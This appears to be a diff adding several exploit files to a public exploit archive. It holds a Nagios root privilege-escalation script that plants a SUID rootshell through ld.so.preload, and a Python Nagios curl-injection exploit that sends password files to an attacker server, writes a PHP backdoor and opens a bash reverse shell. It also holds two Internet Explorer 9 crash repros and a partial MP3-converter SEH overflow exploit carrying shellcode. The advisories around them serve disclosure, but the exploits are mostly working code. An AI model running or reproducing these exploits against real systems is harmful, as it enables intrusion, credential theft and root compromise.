if [ $? -ne 0 ]; then
echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink."
cleanexit 3
fi
echo -e "\n[+] The system appears to be exploitable (writable logdir) ! :) Symlink created at: \n`ls -l $ERRORLOG`"
{
# Wait for Nagios to get restarted
echo -ne "\n[+] Waiting for Nagios service to get restarted...\n"
echo -n "Do you want to shutdown the Nagios daemon to speed up the restart process? ;) [y/N] "
read THE_ANSWER
if [ "$THE_ANSWER" = "y" ]; then
/usr/bin/printf "[%lu] SHUTDOWN_PROGRAM\n" `date +%s` > $commandfile
fi
sleep 3s
ps aux | grep -v grep | grep -i 'bin/nagios'
if [ $? -ne 0 ]; then
echo -ne "\n[+] Nagios stopped. Shouldn't take long now... ;)\n"
fi
while :; do
sleep 1 2>/dev/null
if [ -f /etc/ld.so.preload ]; then
rm -f $ERRORLOG
break;
fi
done
echo -e "\n[+] Nagios restarted. The /etc/ld.so.preload file got created with the privileges: \n`ls -l /etc/ld.so.preload`"
# /etc/ld.so.preload should be owned by nagios:nagios at this point with perms:
# -rw-r--r-- 1 nagios nagios
# Only 'nagios' user can write to it, but 'nagios' group can not.
# This is not ideal as in scenarios like CVE-2016-9565 we might be running as www-data:nagios user.
# We can bypass the lack of write perm on /etc/ld.so.preload by writing to Nagios external command file/pipe
# nagios.cmd, which is writable by 'nagios' group. We can use it to send a bogus command which will
# inject the path to our privesc library into the nagios.log file (i.e. the ld.so.preload file :)
sleep 3s # Wait for Nagios to create the nagios.cmd pipe
if [ ! -p $commandfile ]; then
echo -e "\n[!] Nagios command pipe $commandfile does not exist!"
exit 2
fi
echo -e "\n[+] Injecting $PRIVESCLIB via the pipe nagios.cmd to bypass lack of write perm on ld.so.preload"
now=`date +%s`
/usr/bin/printf "[%lu] NAGIOS_GIVE_ME_ROOT_NOW!;; $PRIVESCLIB \n" $now > $commandfile
sleep 1s
grep -q "$PRIVESCLIB" /etc/ld.so.preload
if [ $? -eq 0 ]; then
echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload | grep "$PRIVESCLIB"`"
else
echo -e "\n[!] Unable to inject the lib to /etc/ld.so.preload"
exit 2
fi
} 2>/dev/null
# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
echo -e "\n[+] Triggering privesc code from $PRIVESCLIB by executing $SUIDBIN SUID binary"
sudo 2>/dev/null >/dev/null
# Check for the rootshell
ls -l $BACKDOORPATH | grep rws | grep -q root 2>/dev/null
if [ $? -eq 0 ]; then
echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
echo -e "\n\033[94mGot root via Nagios!\033[0m"
else
echo -e "\n[!] Failed to get root: \n`ls -l $BACKDOORPATH`"
cleanexit 2
fi
# Use the rootshell to perform cleanup that requires root privileges
$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
rm -f $ERRORLOG
echo > $ERRORLOG
# Execute the rootshell
echo -e "\n[+] Nagios pwned. Spawning the rootshell $BACKDOORPATH now\n"
$BACKDOORPATH -p -i
# Job done.
cleanexit 0
'''
---------------------------------------------------
Example run
~~~~~~~~~~~~~
www-data@debjessie:/tmp$ ./nagios-root-privesc.sh /usr/local/nagios/var/nagios.log
./nagios-root-privesc.sh /usr/local/nagios/var/nagios.log
Nagios Core - Root Privilege Escalation PoC Exploit (CVE-2016-9566)
nagios-root-privesc.sh (ver. 1.0)
Discovered and coded by:
Dawid Golunski
https://legalhackers.com
[+] Starting the exploit as:
uid=33(www-data) gid=33(www-data) groups=33(www-data),1001(nagios),1002(nagcmd)
[+] Compiling the privesc shared library (/tmp/nagios_privesc_lib.c)
[+] Backdoor/low-priv shell installed at:
-rwxrwxrwx 1 root root 1029624 Dec 11 08:44 /tmp/nagiosrootsh
[+] The system appears to be exploitable (writable logdir) ! :) Symlink created at:
lrwxrwxrwx 1 www-data nagios 18 Dec 11 08:44 /usr/local/nagios/var/nagios.log -> /etc/ld.so.preload
[+] Waiting for Nagios service to get restarted...
Do you want to shutdown the Nagios daemon to speed up the restart process? ;) [y/N] y
[+] Nagios stopped. Shouldn't take long now... ;)
[+] Nagios restarted. The /etc/ld.so.preload file got created with the privileges:
-rw-r--r-- 1 nagios nagios 871 Dec 11 08:44 /etc/ld.so.preload
[+] Injecting /tmp/nagios_privesc_lib.so via the pipe nagios.cmd to bypass lack of write perm on ld.so.preload
[+] The /etc/ld.so.preload file now contains:
[1481463869] Warning: Unrecognized external command -> NAGIOS_GIVE_ME_ROOT_NOW!;; /tmp/nagios_privesc_lib.so
[+] Triggering privesc code from /tmp/nagios_privesc_lib.so by executing /usr/bin/sudo SUID binary
[+] Rootshell got assigned root SUID perms at:
-rwsrwxrwx 1 root root 1029624 Dec 11 08:44 /tmp/nagiosrootsh
Got root via Nagios!
[+] Nagios pwned. Spawning the rootshell /tmp/nagiosrootsh now
nagiosrootsh-4.3# exit
exit
[+] Cleaning up...
[+] Job done. Exiting with code 0
Video PoC:
~~~~~~~~~~~~~
https://legalhackers.com/videos/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html
VI. BUSINESS IMPACT
-------------------------
An attacker who has managed to gain access to 'nagios' account, or an account
belonging to 'nagios' group (which is the case in the CVE-2016-9565 scenario)
to escalate their privileges to root and fully compromise the Nagios monitoring
server.
VII. SYSTEMS AFFECTED
-------------------------
Nagios Core < 4.2.4
Vendor notice:
https://www.nagios.org/projects/nagios-core/history/4x/
VIII. SOLUTION
-------------------------
Vendor received this advisory in advance and released a security
release of Nagios 4.2.4 to address this vulnerability.
IX. REFERENCES
-------------------------
https://legalhackers.com
This advisory:
https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html
Exploit code:
https://legalhackers.com/exploits/CVE-2016-9566/nagios-root-privesc.sh
CVE-2016-9566:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9566
Video PoC:
https://legalhackers.com/videos/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html
Nagios Curl Command Injection / Code Exec with 'nagios' group (CVE-2016-9565):
https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
Nagios / Vendor links:
https://www.nagios.org/
CVE-2016-9566:
https://www.nagios.org/projects/nagios-core/history/4x/
https://assets.nagios.com/downloads/nagioscore/docs/Installing_Nagios_Core_From_Source.pdf
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
https://legalhackers.com
XI. REVISION HISTORY
-------------------------
15.12.2016 - Advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
'''

615
platforms/linux/remote/40920.py Executable file
View file

@ -0,0 +1,615 @@
'''
Source: https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com
- CVE-2016-9565
- Release date: 13.12.2016
- Revision 2.0
- Severity: High / Critical
=============================================
I. VULNERABILITY
-------------------------
Nagios Core < 4.2.2 Curl Command Injection / Remote Code Execution
II. BACKGROUND
-------------------------
"Nagios Is The Industry Standard In IT Infrastructure Monitoring
Achieve instant awareness of IT infrastructure problems, so downtime doesn't
adversely affect your business.
Nagios offers complete monitoring and alerting for servers, switches,
applications, and services."
https://www.nagios.org/
III. INTRODUCTION
-------------------------
Nagios Core comes with a PHP/CGI front-end which allows to view status
of the monitored hosts.
This front-end contained a Command Injection vulnerability in a RSS feed reader
class that loads (via insecure clear-text HTTP or HTTPS accepting self-signed
certificates) the latest Nagios news from a remote RSS feed (located on the
vendor's server on the Internet) upon log-in to the Nagios front-end.
The vulnerability could potentially enable remote unauthenticated attackers who
managed to impersonate the feed server (via DNS poisoning, domain hijacking,
ARP spoofing etc.), to provide a malicious response that injects parameters to
curl command used by the affected RSS client class and effectively
read/write arbitrary files on the vulnerable Nagios server.
This could lead to Remote Code Execution in the context of www-data/nagios user
on default Nagios installs that follow the official setup guidelines.
IV. DESCRIPTION
-------------------------
Vulnerability
~~~~~~~~~~~~~~~
The vulnerability was caused by the use of a vulnerable component for handling
RSS news feeds - MagpieRSS in Nagios Core control panel / front-end.
The component was used by Nagios front-end to load news feeds from remote
feed source upon log-in.
The component was found vulnerable to CVE-2008-4796.
Below are relevant parts of code from the vulnerable RSS class:
----------------------------------------------------
function fetch($URI)
{
...
case "https":
...
$path = $URI_PARTS["path"].($URI_PARTS["query"] ? "?".$URI_PARTS["query"] : "");
$this->_httpsrequest($path, $URI, $this->_httpmethod);
...
}
...
function _httpsrequest($url,$URI,$http_method,$content_type="",$body="")
{
# accept self-signed certs
$cmdline_params .= " -k";
exec($this->curl_path." -D \"/tmp/$headerfile\"".escapeshellcmd($cmdline_params)." ".escapeshellcmd($URI),$results,$return);
---------------------------------------------------------
As can be seen, the _httpsrequest function uses a curl command to handle HTTPS
requests. The sanitization used to escape $URI did not prevent injection of
additional parameters to curl command which made it possible to, for example, get
curl to write out the https response to an arbitrary file with the $URI:
https://attacker-svr -o /tmp/result_file
The vulnerability was reported to Nagios security team.
Nagios 4.2.0 was released which contained the following fix for CVE-2008-4796:
---------------------------------------------------------
# accept self-signed certs
$cmdline_params .= " -k";
exec($this->curl_path." -D \"/tmp/$headerfile\"".$cmdline_params." \"".escapeshellcmd($URI)."\"",$results,$return);
---------------------------------------------------------
Further research found the fix to be incomplete as the extra sanitization
by the above patch could be bypassed by adding extra quote characters in
the $URI variable e.g:
https://attacker-svr" -o /tmp/nagioshackedagain "
This vulnerability has been assigned CVE-2016-9565 and was addressed by Nagios
team in the new release of Nagios 4.2.2 by removing the vulnerable class.
Injection Point / Controling $URI var
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The affected versions of Nagios Core front-end contain three files that trigger
the _httpsrequest() function with the injectable curl command shown above:
- rss-corefeed.php
- rss-corebanner.php
- rss-newsfeed.php
These are used to fetch news via an RSS feed from www.nagios.org website via
HTTP or HTTPS (see the notes below) protocols.
The news are displayed on the Home page of the Nagios front-end upon log-in.
All 3 scripts call fetch_rss() as follows:
------[ rss-corefeed.php ]------
<?php
//build splash divs to ajax load
do_corefeed_html();
function do_corefeed_html() {
$url="http://www.nagios.org/backend/feeds/corepromo";
$rss=fetch_rss($url);
$x=0;
//build content string
if($rss) {
$html ="
<ul>";
foreach ($rss->items as $item){
$x++;
if($x>3)
break;
//$href = $item['link'];
//$title = $item['title'];
$desc = $item['description'];
$html .="<li>{$item['description']}</li>";
}
$html .="</ul>";
print $html;
--------------------------------
An attacker who managed to impersonate www.nagios.org domain and respond to the web
request made by the fetch_rss() function could send a malicious 302 redirect to set
$URI variable from the _httpsrequest() function to an arbitrary value and thus
control the curl command parameters.
For example, the following redirect:
Location: https://attackers-host/get-data.php -Fpasswd=@/etc/passwd
would execute curl with the parameters:
curl -D /tmp/$headerfile https://attackers-host/get-data.php -Fpasswd=@/etc/passwd
and send the contents of the pnsswd file from the Nagios system to the attacker's
server in a POST request.
Attack Vectors
~~~~~~~~~~~~~~~~~~
In order to supply a malicious response to fetch_rss() the attacker would
need to impersonate the www.nagios.org domain in some way.
Well-positioned attackers within the target's network could try network
attacks such as DNS spoofing, ARP poisoning etc.
A compromised DNS server/resolver within an organisation could be used by
attackers to exploit the Nagios vulnerability to gain access to the monitoring
server.
The vulnerability could potentially become an Internet threat and be used to
exploit a large number of affected Nagios installations in case of a compromise
of a DNS server/resolver belonging to a large-scale ISP.
Notes
~~~~~~~~~~~~~~~~~~
[*] Nagios front-end in versions <= 4.0.5 automatically load the rss-*.php files
upon login to the Nagios control panel. Later versions contain the
vulnerable scripts but do not load them automatically.
On such installations an attacker could still be successful in one of the cases:
a) if attacker had low-privileged access (guest/viewer account) to the control
panel and was able to execute /nagios/rss-newsfeed.php script
b) perform a CSRF attack / entice a logged-in nagios user to open the URL:
http://nagios-server/nagios/rss-newsfeed.php
c) well-positioned attackers on the network might be able to modify the
traffic and inject a redirect to /rss-newsfeed.php script when Nagios control
panel is accessed via HTTP by an authenticated user
[*] The rss-*.php scripts in Nagios Core >=4.0.8 use HTTPS to fetch news feeds
however as has been previously shown in _httpsrequest() function, the curl
command gets passed a '-k' (--insecure) parameter which accepts self-signed
certificates.
Arbitrary Code Execution
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nagios Core installations that follow the official installation guidelines:
https://assets.nagios.com/downloads/nagioscore/docs/Installing_Nagios_Core_From_Source.pdf
as well as the commercial Nagios VMs available for purchase on the vendor website
make the web-server user (www-data) part of the 'nagios' group which has
write access to the web document root (/usr/local/nagios/share).
This can allow attackers who manage to exploit the vulnerability and
inject parameters to curl command to save a PHP backdoor within the document
root via a 302 redirect similar to:
Location: http://attacker/php-backdoor.php --trace-ascii /usr/local/nagios/share/nagios-backdoor.php
and have it executed automatically upon a log-in to the Nagios control panel via html/JS code
snippet returned as a part of the RSS feed as demonstrated by the PoC exploit below.
The privileges could then be raised from nagios user to root via another Nagios
vulnerability discovered by the author of this advisory CVE-2016-9566:
http://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html
V. PROOF OF CONCEPT
-------------------------
Below is an exploit that demonstrates reading, writing, and code execution
on affected Nagios installations.
The attack flow is as follows:
For simplicity, to test the attack vector, a static DNS entry can be added
inside the /etc/hosts file on the victim Nagios server to point the
www.nagios.org domain at an attacker's IP where the exploit is executed.
----------[ nagios_cmd_injection.py ]----------
'''
#!/usr/bin/env python
intro = """\033[94m
Nagios Core < 4.2.0 Curl Command Injection / Code Execution PoC Exploit
CVE-2016-9565
nagios_cmd_injection.py ver. 1.0
Discovered & Coded by:
Dawid Golunski
https://legalhackers.com
\033[0m
"""
usage = """
This PoC exploit can allow well-positioned attackers to extract and write
arbitrary files on the Nagios server which can lead to arbitrary code execution
on Nagios deployments that follow the official Nagios installation guidelines.
For details, see the full advisory at:
https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
PoC Video:
https://legalhackers.com/videos/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
Follow https://twitter.com/dawid_golunski for updates on this advisory.
Remember you can turn the nagios shell into root shell via CVE-2016-9565:
https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html
Usage:
./nagios_cmd_injection.py reverse_shell_ip [reverse_shell_port]
Disclaimer:
For testing purposes only. Do no harm.
"""
import os
import sys
import time
import re
import tornado.httpserver
import tornado.web
import tornado.ioloop
exploited = 0
docroot_rw = 0
class MainHandler(tornado.web.RequestHandler):
def get(self):
global exploited
if (exploited == 1):
self.finish()
else:
ua = self.request.headers['User-Agent']
if "Magpie" in ua:
print "[+] Received GET request from Nagios server (%s) ! Sending redirect to inject our curl payload:\n" % self.request.remote_ip
print '-Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii ' + backdoor_path + '\n'
self.redirect('https://' + self.request.host + '/nagioshack -Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii ' + backdoor_path, permanent=False)
exploited = 1
def post(self):
global docroot_rw
print "[+] Success, curl payload injected! Received data back from the Nagios server %s\n" % self.request.remote_ip
# Extract /etc/passwd from the target
passwd = self.request.files['passwd'][0]['body']
print "[*] Contents of /etc/passwd file from the target:\n\n%s" % passwd
# Extract /usr/local/nagios/etc/htpasswd.users
htauth = self.request.files['htauth'][0]['body']
print "[*] Contents of /usr/local/nagios/etc/htpasswd.users file:\n\n%s" % htauth
# Extract nagios group from /etc/group
group = self.request.files['group'][0]['body']
for line in group.splitlines():
if "nagios:" in line:
nagios_group = line
print "[*] Retrieved nagios group line from /etc/group file on the target: %s\n" % nagios_group
if "www-data" in nagios_group:
print "[+] Happy days, 'www-data' user belongs to 'nagios' group! (meaning writable webroot)\n"
docroot_rw = 1
# Put backdoor PHP payload within the 'Server' response header so that it gets properly saved via the curl 'trace-ascii'
# option. The output trace should contain an unwrapped line similar to:
#
# == Info: Server <?php system("/bin/bash -c 'nohup bash -i >/dev/tcp/192.168.57.3/8080 0<&1 2>&1 &'"); ?> is not blacklisted
#
# which will do the trick as it won't mess up the payload :)
self.add_header('Server', backdoor)
# Return XML/feed with JavaScript payload that will run the backdoor code from nagios-backdoor.php via <img src=> tag :)
print "[*] Feed XML with JS payload returned to the client in the response. This should load nagios-backdoor.php in no time :) \n"
self.write(xmldata)
self.finish()
tornado.ioloop.IOLoop.instance().stop()
if __name__ == "__main__":
global backdoor_path
global backdoor
print intro
# Set attacker's external IP & port to be used by the reverse shell
if len(sys.argv) < 2 :
print usage
sys.exit(2)
attacker_ip = sys.argv[1]
if len(sys.argv) == 3 :
attacker_port = sys.argv[1]
else:
attacker_port = 8080
# PHP backdoor to be saved on the target Nagios server
backdoor_path = '/usr/local/nagios/share/nagios-backdoor.php'
backdoor = """<?php system("/bin/bash -c 'nohup bash -i >/dev/tcp/%s/%s 0<&1 2>&1 &'"); die("stop processing"); ?>""" % (attacker_ip, attacker_port)
# Feed XML containing JavaScript payload that will load the nagios-backdoor.php script
global xmldata
xmldata = """<?xml version="1.0"?>
<rss version="2.0">
<channel>
<title>Nagios feed with injected JS payload</title>
<item>
<title>Item 1</title>
<description>
<strong>Feed injected. Here we go </strong> -
loading /nagios/nagios-backdoor.php now via img tag... check your netcat listener for nagios shell ;)
<img src="/nagios/nagios-backdoor.php" onerror="alert('Reverse Shell /nagios/nagios-backdoor.php executed!')">
</description>
</item>
</channel>
</rss> """
# Generate SSL cert
print "[+] Generating SSL certificate for our python HTTPS web server \n"
os.system("echo -e '\n\n\n\n\n\n\n\n\n' | openssl req -nodes -new -x509 -keyout server.key -out server.cert 2>/dev/null")
print "[+] Starting the web server on ports 80 & 443 \n"
application = tornado.web.Application([
(r'/.*', MainHandler)
])
application.listen(80)
http_server = tornado.httpserver.HTTPServer(
application,
ssl_options = {
"certfile": os.path.join("./", "server.cert"),
"keyfile": os.path.join("./", "server.key"),
}
)
http_server.listen(443)
print "[+] Web server ready for connection from Nagios (http://target-svr/nagios/rss-corefeed.php). Time for your dnsspoof magic... ;)\n"
tornado.ioloop.IOLoop.current().start()
if (docroot_rw == 1):
print "[+] PHP backdoor should have been saved in %s on the target by now!\n" % backdoor_path
print "[*] Spawning netcat and waiting for the nagios shell (remember you can escalate to root via CVE-2016-9566 :)\n"
os.system("nc -v -l -p 8080")
print "\n[+] Shell closed\n"
print "[+] That's all. Exiting\n"
'''
-----------------------------------------------
Video PoC
~~~~~~~~~~~~~
https://legalhackers.com/videos/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
Example exploit run
~~~~~~~~~~~~~~~~~~~~~
root@xenial:~/nagios-exploit# ./nagios_cmd_injection.py 192.168.57.3
Nagios Core < 4.2.0 Curl Command Injection / Code Execution PoC Exploit
CVE-2016-9565
nagios_cmd_injection.py ver. 1.0
Discovered & Coded by:
Dawid Golunski
https://legalhackers.com
[+] Generating SSL certificate for our python HTTPS web server
[+] Starting the web server on ports 80 & 443
[+] Web server ready for connection from Nagios (http://target-svr/nagios/rss-corefeed.php). Time for your dnsspoof magic... ;)
[+] Received GET request from Nagios server (192.168.57.4) ! Sending redirect to inject our curl payload:
-Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii /usr/local/nagios/share/nagios-backdoor.php
[+] Success, curl payload injected! Received data back from the Nagios server 192.168.57.4
[*] Contents of /etc/passwd file from the target:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
nagios:x:1001:1001::/home/nagios:/bin/sh
[..cut..]
[*] Contents of /usr/local/nagios/etc/htpasswd.users file:
nagiosadmin:$apr1$buzCfFb$GjV/ga6PHp53qePf0
[*] Retrieved nagios group line from /etc/group file on the target: nagios:x:1001:www-data
[+] Happy days, 'www-data' user belongs to 'nagios' group! (meaning writable webroot)
[*] Feed XML with JS payload returned to the client in the response. This should load nagios-backdoor.php in no time :)
[+] PHP backdoor should have been saved in /usr/local/nagios/share/nagios-backdoor.php on the target by now!
[*] Spawning netcat and waiting for the nagios shell (remember you can escalate to root via CVE-2016-9566 :)
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [192.168.57.4] port 8080 [tcp/http-alt] accepted (family 2, sport 38718)
www-data@debjessie:/usr/local/nagios/share$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),1001(nagios),1002(nagcmd)
www-data@debjessie:/usr/local/nagios/share$ groups
groups
www-data nagios nagcmd
www-data@debjessie:/usr/local/nagios/share$ cat nagios-backdoor.php
[..cut..]
== Info: Server <?php system("/bin/bash -c 'nohup bash -i >/dev/tcp/192.168.57.3/8080 0<&1 2>&1 &'"); die("stop processing"); ?> is not blacklisted
[..cut..]
www-data@debjessie:/usr/local/nagios/share$ ls -ld .
ls -ld .
drwxrwsr-x 16 nagios nagios 4096 Dec 9 20:00 .
www-data@debjessie:/usr/local/nagios/share$ exit
exit
exit
[+] Shell closed
[+] That's all. Exiting
VI. BUSINESS IMPACT
-------------------------
Successfull exploitation of the vulnerability could allow remote attackers
to extract sensitive data from the Nagios monitoring server as well as
achieve arbitrary code execution as demonstrated by the exploit.
The monitoring server is usually critical within an organisation as it
often has remote access to all hosts within the network. For this reason
a compromise could likely allow attackers to expand their access within
the network to other internal servers.
Corporate monitoring servers with a large number of connected hosts are
often left unpatched due to their sensitive/central role on the network
which increase the chances of exploitation.
As explained in the description section, the vulnerability could be a threat
coming from the Internet. If a major ISP / DNS, or nagios.org site itself was
compromised, this could potentially allow attackers to exploit the vulnerability
on multiple Nagios installations which retrieve RSS feeds automatically and the
corporate firewall does not stop the egress traffic from the monitoring server.
As a result, an attacker could potentially gain unauthorised access to
affected Nagios installations without even knowing the target IP addresses
and despite a lack of direct access to the target (blocked igress traffic on
the firewall).
VII. SYSTEMS AFFECTED
-------------------------
Both of the Nagios Core stable branches 3.x and 4.x are affected.
The vulnerability was disclosed responsibly to the vendor and was fully fixed
in Nagios Core 4.2.2.
Nagios Core versions <= 4.0.5 are at the highest risk as they are the easiest
to exploit (automatically load the vulnerable scripts upon log-in to the Nagios
control panel).
VIII. SOLUTION
-------------------------
Update to the latest Nagios Core release.
IX. REFERENCES
-------------------------
https://legalhackers.com
This advisory (CVE-2016-9565) URL:
https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
Root Privilege Escalation from nagios system user to root (CVE-2016-9566):
https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html
Video PoC:
https://legalhackers.com/videos/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
Exploit source code:
https://legalhackers.com/exploits/CVE-2016-9565/nagios_cmd_injection.py
https://www.nagios.org
Nagios patch history:
https://www.nagios.org/projects/nagios-core/history/4x/
MagpieRSS CVE-2008-4796:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4796
Nagios Core installation guide:
https://assets.nagios.com/downloads/nagioscore/docs/Installing_Nagios_Core_From_Source.pdf
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
https://legalhackers.com
XI. REVISION HISTORY
-------------------------
13.12.2016 - Advisory released
14.12.2016 - Extended introduction
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
'''

62
platforms/windows/dos/40922.html Executable file
View file

@ -0,0 +1,62 @@
<!--
Source: http://blog.skylined.nl/20161213001.html
Synopsis
A specially crafted web-page can trigger a use-after-free vulnerability in Microsoft Internet Explorer 9. During a method call, the this object can be freed and then continues to be used by the code that implements the method. It appears that there is little to no time for an attacker to attempt to control the contents of the freed memory before the re-use, which would allow remote code execution.
Known affected software and attack vectors
Microsoft Internet Explorer 9
An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script should prevent an attacker from triggering the vulnerable code path.
Repro.html:
-->
<!DOCTYPE>
<script defer>
document.design­Mode = "on";
</script>
<q dir="ltr">
<ruby dir="rtl">
<!--
Details
By switching the a document's design­Mode property to on in a deferred script, MSIE 9 can be made to reload a web page using CMarkup::Reload­In­Compat­View. This method calls CDoc::Compat­View­Refresh, which indirectly calls CScript­Collection::~CScript­Collection, which releases the CMarkup object used as this in CMarkup::Reload­In­Compat­View. The relevant stack for the freeing of this CMarkup object is:
76e8c484 kernel32!Heap­Free+0x00000014
6780c4d8 MSHTML!CMarkup::`vector deleting destructor'+0x00000026
6776fb9b MSHTML!CScript­Collection::~CScript­Collection+0x00000152
67816a0d MSHTML!CScript­Collection::Release+0x00000053
6751f7e7 MSHTML!CWindow::Super­Navigate­Internal+0x000004c4
675209f7 MSHTML!CWindow::Super­Navigate2With­Bind­Flags+0x00000032
679b05f8 MSHTML!CDoc::Compat­View­Refresh+0x000000a0
679c00d4 MSHTML!CMarkup::Reload­In­Compat­View+0x0000021f
Immediately after returning to CMarkup::Reload­In­Compat­View, the code will use the (now freed) CMarkup object. When page heap is enabled, this lead to an immediate access violation.
Exploit
I did not immediately find a way to control the freed memory before the reuse following the CDoc::Compat­View­Refresh call. I did not immediately find other locations in the code where the same stale pointer to the CMarkup object is used after it has been freed. It may not be possible to exploit this use-after-free, as there does not appear to be an easy window of opportunity to modify the freed memory before its reuse.
However, when loading the repro in MSIE with page heap disabled, I do see crashes from time to time, but in different locations in the code. This indicates that one or more of the following should be true:
There are ways to modify the freed CMarkup object before it is reused.
There are other locations where the freed CMarkup object is used after it has been freed, and the freed CMarkup object can be modified before this happens.
There could be other stale pointers to freed memory that get reused, and there are ways to modify the freed memory they point to before that reuse.
As these other crash stacks do not include CMarkup::Reload­In­Compat­View, it seems most likely that they are caused by the second or third option, which could indicate that the bug is in fact exploitable.
Time-line
5 May 2014: This vulnerability was found through fuzzing.
14 May 2014: This vulnerability was submitted to ZDI.
3 July 2014: This vulnerability was rejected by ZDI.
9 July 2014: This vulnerability was submitted to EIP.
July/August 2014: This vulnerability was rejected by EIP.
13 August 2014: This vulnerability was submitted to i­Defense.
Date unknown: This issue was withdrawn from i­Defense.
Date unknown: This vulnerability was address by Microsoft.
13 December 2016: Details of this vulnerability are released.
-->

50
platforms/windows/dos/40923.html Executable file
View file

@ -0,0 +1,50 @@
<!--
Source: http://blog.skylined.nl/20161214001.html
Synopsis
A specially crafted web-page can trigger a use-after-free vulnerability in Microsoft Internet Explorer 9. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability.
Known affected software and attack vectors
Microsoft Internet Explorer 9
An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script should prevent an attacker from triggering the vulnerable code path.
Details
This bug was found back when I had very little knowledge and tools to do analysis on use-after-free bugs, so I have no details to share. ZDI revealed that this was a use-after-free vulnerability, though their advisory mentions an iframe, which is not in the repro I provided. I have included a number of reports created using a predecessor of Bug­Id below.
Repro.html:
-->
<!DOCTYPE html>
<html>
<script>
document.add­Event­Listener("load", function (){
document.document­Element.remove­Node(true);
}, true);
document.add­Event­Listener("DOMNode­Removed", function (){
document.write("");
}, true);
</script>
<style>
</style>
<span dir="rtl">
<ruby dir="ltr">
<br/>
</ruby>
</span>
</html>
<!--
Time-line
Sometime in November 2012: This vulnerability was found through fuzzing.
11 November 2012: This vulnerability was submitted to EIP.
10 December 2012: This vulnerability was rejected by EIP.
12 December 2012: This vulnerability was submitted to ZDI.
25 January 2013: This vulnerability was acquired by ZDI.
15 February 2013: This vulnerability was disclosed to Microsoft by ZDI.
26 July 2013: This vulnerability was address by Microsoft in MS13-055.
14 December 2016: Details of this vulnerability are released.
-->

67
platforms/windows/local/40917.py Executable file
View file

@ -0,0 +1,67 @@
#!python
#####################################################################################
# Exploit title: MP3 converter v 2.6.18 License code SEH exploit
# Date: 2016-12-15
# Vendor homepage: http://www.nidesoft.com/mp3-converter.html
# Download: http://www.nidesoft.com/downloads/mp3-converter.exe
# Tested on: Win7 SP1
# Author: malwrforensics
# Details: Launch program and enter the license code in the "Register" window
# Copy&Paste the "license" from poc.txt
#####################################################################################
def write_poc(fname, buffer):
fhandle = open(fname , 'wb')
fhandle.write(buffer)
fhandle.close()
fname="poc.txt"
buf = '\x41' * 0x176c
###################################
#msfvenom --payload windows/exec
#cmd=calc.exe --platform windows
#-f python -e x86/alpha_mixed
##################################
shellcode = ""
shellcode += "\x89\xe0\xda\xdc\xd9\x70\xf4\x59\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37"
shellcode += "\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
shellcode += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
shellcode += "\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x58\x68\x4d\x52"
shellcode += "\x37\x70\x63\x30\x33\x30\x75\x30\x4b\x39\x59\x75\x45"
shellcode += "\x61\x79\x50\x70\x64\x4c\x4b\x42\x70\x36\x50\x4c\x4b"
shellcode += "\x42\x72\x66\x6c\x6e\x6b\x66\x32\x66\x74\x6c\x4b\x74"
shellcode += "\x32\x37\x58\x34\x4f\x4d\x67\x61\x5a\x45\x76\x75\x61"
shellcode += "\x69\x6f\x4e\x4c\x77\x4c\x43\x51\x63\x4c\x54\x42\x66"
